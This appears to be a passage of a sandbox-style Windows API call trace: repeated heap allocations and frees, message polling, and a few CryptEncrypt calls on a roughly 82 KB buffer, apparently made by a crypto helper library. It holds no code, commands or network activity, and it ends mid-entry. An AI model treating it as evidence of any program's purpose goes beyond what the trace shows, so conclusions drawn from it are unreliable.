[0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0266.828] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.828] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0266.828] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.829] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0266.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0266.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0266.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0266.830] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.833] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x142d7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x142d8) returned 1 [0266.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.833] CharLowerBuffW (in: lpsz="byte[82648]", cchLength=0xb | out: lpsz="byte[82648]") returned 0xb [0266.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.837] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51be0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.839] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe64328*, pdwDataLen=0x8cef60*=0x142d7, dwBufLen=0x142d8 | out: pbData=0xe64328*, pdwDataLen=0x8cef60*=0x142d8) returned 1 [0266.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0266.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0xe78608 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x142d8) returned 0xe8c8e8 [0266.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe78608 | out: hHeap=0x970000) returned 1 [0266.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.846] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.846] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.846] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.846] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0266.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0266.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0266.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0266.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 